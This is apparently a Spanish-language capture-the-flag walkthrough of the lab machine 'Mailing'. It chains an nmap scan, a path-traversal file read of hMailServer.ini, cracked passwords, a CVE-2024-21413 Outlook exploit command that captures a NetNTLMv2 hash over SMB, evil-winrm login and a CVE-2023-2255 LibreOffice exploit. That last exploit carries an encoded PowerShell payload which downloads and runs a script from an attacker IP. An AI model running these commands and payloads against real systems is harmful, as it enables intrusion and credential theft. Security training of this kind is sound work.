Mailing

Enumeración:

   5   │ PORT      STATE SERVICE       VERSION
   6   │ 25/tcp    open  smtp          hMailServer smtpd
   7   │ | smtp-commands: mailing.htb, SIZE 20480000, AUTH LOGIN PLAIN, HELP
   8   │ |_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
   9   │ 80/tcp    open  http          Microsoft IIS httpd 10.0
  10   │ |_http-server-header: Microsoft-IIS/10.0
  11   │ |_http-title: Did not follow redirect to http://mailing.htb
  12   │ 110/tcp   open  pop3          hMailServer pop3d
  13   │ |_pop3-capabilities: UIDL TOP USER
  14   │ 135/tcp   open  msrpc         Microsoft Windows RPC
  15   │ 139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
  16   │ 143/tcp   open  imap          hMailServer imapd
  17   │ |_imap-capabilities: IMAP4 CHILDREN completed IMAP4rev1 RIGHTS=texkA0001
       │  IDLE CAPABILITY OK ACL QUOTA SORT NAMESPACE
  18   │ 445/tcp   open  microsoft-ds?
  19   │ 465/tcp   open  ssl/smtp      hMailServer smtpd
  20   │ |_ssl-date: TLS randomness does not represent time
  21   │ | ssl-cert: Subject: commonName=mailing.htb/organizationName=Mailing Ltd
       │ /stateOrProvinceName=EU\Spain/countryName=EU
  22   │ | Not valid before: 2024-02-27T18:24:10
  23   │ |_Not valid after:  2029-10-06T18:24:10
  24   │ | smtp-commands: mailing.htb, SIZE 20480000, AUTH LOGIN PLAIN, HELP
  25   │ |_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
  26   │ 587/tcp   open  smtp          hMailServer smtpd
  27   │ | smtp-commands: mailing.htb, SIZE 20480000, STARTTLS, AUTH LOGIN PLAIN,
       │  HELP
  28   │ |_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
  29   │ | ssl-cert: Subject: commonName=mailing.htb/organizationName=Mailing Ltd
       │ /stateOrProvinceName=EU\Spain/countryName=EU
  30   │ | Not valid before: 2024-02-27T18:24:10
  31   │ |_Not valid after:  2029-10-06T18:24:10
  32   │ |_ssl-date: TLS randomness does not represent time
  33   │ 993/tcp   open  ssl/imap      hMailServer imapd
  34   │ | ssl-cert: Subject: commonName=mailing.htb/organizationName=Mailing Ltd
       │ /stateOrProvinceName=EU\Spain/countryName=EU
  35   │ | Not valid before: 2024-02-27T18:24:10
  36   │ |_Not valid after:  2029-10-06T18:24:10
  37   │ |_ssl-date: TLS randomness does not represent time
  38   │ 5040/tcp  open  unknown
  39   │ 5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
  40   │ |_http-server-header: Microsoft-HTTPAPI/2.0
  41   │ |_http-title: Not Found
  42   │ 7680/tcp  open  pando-pub?
  43   │ 47001/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
  44   │ |_http-server-header: Microsoft-HTTPAPI/2.0
  45   │ |_http-title: Not Found
  46   │ 49664/tcp open  msrpc         Microsoft Windows RPC
  47   │ 49665/tcp open  msrpc         Microsoft Windows RPC
  48   │ 49666/tcp open  msrpc         Microsoft Windows RPC
  49   │ 49667/tcp open  msrpc         Microsoft Windows RPC
  50   │ 49668/tcp open  msrpc         Microsoft Windows RPC
  51   │ 56679/tcp open  msrpc         Microsoft Windows RPC
  52   │ Service Info: Host: mailing.htb; OS: Windows; CPE: cpe:/o:microsoft:wind
       │ ows
  53   │ 
  54   │ Host script results:
  55   │ |_clock-skew: 2m03s
  56   │ | smb2-security-mode: 
  57   │ |   3:1:1: 
  58   │ |_    Message signing enabled but not required
  59   │ | smb2-time: 
  60   │ |   date: 2025-07-12T22:22:27
  61   │ |_  start_date: N/A
  62   │ 
  63   │ Service detection performed. Please report any incorrect results at http
       │ s://nmap.org/submit/ .
  64   │ # Nmap done at Sun Jul 13 00:21:13 2025 -- 1 IP address (1 host up) scan
       │ ned in 225.77 seconds

Information Leakage through LFI (hMailServer)

MailServer es el nombre que hace referencia a la máquina o servicio que está gestionando el correo. En este caso, hMailServer está corriendo en el puerto 110, permitiendo la recepción de correos electrónicos a través de POP3.

Por ello buscamos rutas potenciales de hMailServer

curl -s -X GET 'http://mailing.htb/download.php?file=..\..\..\..\program+files+(x86)\hMailServer\Bin\hMailServer.ini'

Crakeamos el hash:

Decrypt MD5, SHA1, MySQL, NTLM, SHA256, MD5 Email, SHA256 Email, SHA512, Wordpress, Bcrypt hashes for free onlinehashes.com

homenetworkingadministrator

Microsoft Outlook Remote Code Execution (RCE) - CVE-2024-21413

GitHub - xaitax/CVE-2024-21413-Microsoft-Outlook-Remote-Code-Execution-Vulnerability: Microsoft-Outlook-Remote-Code-Execution-VulnerabilityGitHub

El poc:

python3 CVE-2024-21413.py --server mailing.htb --port 587 --username administrator@mailing.htb --password homenetworkingadministrator --sender administrator@mailing.htb --recipient maya@mailing.htb --url "\\10.10.16.10\smbfolder\test" --subject "fast please"

Y no usaremos responder:

impacket-smbserver smbfolder $(pwd) -smb2support

Intentaremos crakear:

Pero antes miraremos que tipo de hash es con:

❯ hashid  'maya::MAILING:aaaaaaaaaaaaaaaa:5c0aaa5ab3db32bcc28f8a48276cb556:010100000000000080c054f887f3db01726a19b64ff15f490000000001001000540053006f0056007900560070004e0003001000540053006f0056007900560070004e0002001000760062006d0048004b004b006d00730004001000760062006d0048004b004b006d0073000700080080c054f887f3db0106000400020000000800300030000000000000000000000000200000534e8761ded02ade1e96218718a2374626b5c6edf1a2ed9d8282c1776e2ea6d70a001000000000000000000000000000000000000900200063006900660073002f00310030002e00310030002e00310036002e00310030000000000000000000'
Analyzing 'maya::MAILING:aaaaaaaaaaaaaaaa:5c0aaa5ab3db32bcc28f8a48276cb556:010100000000000080c054f887f3db01726a19b64ff15f490000000001001000540053006f0056007900560070004e0003001000540053006f0056007900560070004e0002001000760062006d0048004b004b006d00730004001000760062006d0048004b004b006d0073000700080080c054f887f3db0106000400020000000800300030000000000000000000000000200000534e8761ded02ade1e96218718a2374626b5c6edf1a2ed9d8282c1776e2ea6d70a001000000000000000000000000000000000000900200063006900660073002f00310030002e00310030002e00310036002e00310030000000000000000000'
[+] NetNTLMv2

[+] NetNTLMv2

hashcat -a 0 -m 5600 hash.txt /usr/share/wordlists/rockyou.txt -O

Contraseña: m4y4ngs4ri

Validando la contraseña:

nxc smb 10.10.11.14 -u 'maya' -p 'm4y4ngs4ri'

Si es valida!!

Listamos archivos compartidos:

nxc smb 10.10.11.14 -u 'maya' -p 'm4y4ngs4ri' --shares

Pero no en el directorio no hay nada por ello verificaremos si este usuario con su contraseña esta en el grupo Managedusers:

nxc winrm 10.10.11.14 -u 'maya' -p 'm4y4ngs4ri'

Bueno entramos:

 evil-winrm -i 10.10.11.14 -u 'maya'  -p 'm4y4ngs4ri'

Entramos como mayra.

ESCALADA DE PRIVILEGIOS

Office 7.4.0.1

Buscamos la versión

C:\Program Files\LibreOffice\program\version.ini

Buscamos el exploit:

GitHub - elweth-sec/CVE-2023-2255: CVE-2023-2255 Libre OfficeGitHub

Creamos nuestro payload en Powershell

Usaremos el formato que permite windowds: utf-16le

cat payload |iconv -t utf-16le | bae64 -w 0

Bien ahora crearemos el documento malicioso

python3 CVE-2023-2255.py --cmd 'cmd/c powershell -enc SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvADEAMAAuADEAMAAuADEANgAuADEAMAA6ADgAMAAwADAALwByAGUAdgBlAHIAcwBlAC4AcABzADEAJwApAAoA' --output 'exploit.odt' --output exploit.odt